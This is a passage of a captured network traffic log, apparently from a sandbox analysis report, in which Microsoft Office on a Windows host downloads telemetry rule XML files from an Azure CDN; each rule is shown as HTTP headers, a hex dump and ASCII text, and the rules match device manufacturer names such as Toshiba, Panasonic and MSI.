                                                                                                                    2024-11-25 18:53:25 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    53192.168.2.44984213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:25 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:25 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:25 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 427
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                    ETag: "0x8DC582BA909FA21"
                                                                                                                    x-ms-request-id: c86812d3-d01e-005a-35c0-3e7fd9000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185325Z-178bfbc474bpscmfhC1NYCfc2c00000006dg00000000k3xx
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:25 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    54192.168.2.44984313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:25 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:25 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:25 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 486
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                    ETag: "0x8DC582B92FCB436"
                                                                                                                    x-ms-request-id: 95b9e869-801e-008c-3081-3b7130000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185325Z-174c587ffdfl22mzhC1TEBk40c00000006b0000000010cep
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:25 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    55192.168.2.44984413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:25 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:25 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:25 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 423
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                    ETag: "0x8DC582BB7564CE8"
                                                                                                                    x-ms-request-id: 79f6ed77-701e-0021-554e-3c3d45000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185325Z-15b8b599d886w4hzhC1TEBb4ug00000006cg00000000bzem
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:25 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    56192.168.2.44984613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:27 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:27 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:27 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 404
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                    ETag: "0x8DC582B95C61A3C"
                                                                                                                    x-ms-request-id: 6056d4b9-d01e-002b-71bf-3e25fb000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185327Z-178bfbc474b9fdhphC1NYCac0n00000007w0000000003mhg
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:27 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    57192.168.2.44984513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:27 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:27 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:27 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 478
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                    ETag: "0x8DC582B9B233827"
                                                                                                                    x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185327Z-174c587ffdfb5q56hC1TEB04kg000000068000000000efff
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:27 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    58192.168.2.44984813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:27 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:27 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:27 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 400
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                    ETag: "0x8DC582BB2D62837"
                                                                                                                    x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185327Z-174c587ffdf6b487hC1TEBydsn000000069g0000000096fu
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:27 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    59192.168.2.44984713.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:27 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:27 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:27 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 468
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                    ETag: "0x8DC582BB046B576"
                                                                                                                    x-ms-request-id: 414c800a-401e-0035-7cbf-3e82d8000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185327Z-178bfbc474btrnf9hC1NYCb80g000000081g000000009sxn
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:27 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    60192.168.2.44984913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:27 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:27 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:27 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 479
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                    ETag: "0x8DC582BB7D702D0"
                                                                                                                    x-ms-request-id: c4b984cf-b01e-001e-2446-3c0214000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185327Z-15b8b599d88f9wfchC1TEBm2kc00000006hg00000000324s
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:27 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    61192.168.2.44985013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:29 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:29 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:29 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 425
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                    ETag: "0x8DC582BBA25094F"
                                                                                                                    x-ms-request-id: 3db646ab-d01e-00a1-471b-3e35b1000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185329Z-15b8b599d88hr8sfhC1TEBbca400000006a0000000002yn2
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-25 18:53:29 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    62192.168.2.44985113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-25 18:53:29 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-25 18:53:29 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Mon, 25 Nov 2024 18:53:29 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 475
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                    ETag: "0x8DC582BB2BE84FD"
                                                                                                                    x-ms-request-id: 974535d3-001e-002b-30bf-3e99f2000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241125T185329Z-178bfbc474bbbqrhhC1NYCvw7400000007wg00000000vcnz
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
